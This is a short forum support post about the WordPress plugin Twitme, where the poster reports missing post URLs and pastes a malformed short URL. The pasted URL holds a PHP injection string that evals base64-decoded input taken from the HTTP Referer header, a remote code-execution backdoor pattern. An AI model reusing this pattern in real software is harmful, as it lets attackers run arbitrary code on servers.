[Plugin: Twitme] Problems!

First the posts were not showing a URL, so I tried turning off the short URL. Then I got this:
https://bit.ly/dfTEnq{${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ …When I turn the short URL back on, I get no URL again!
What gives?
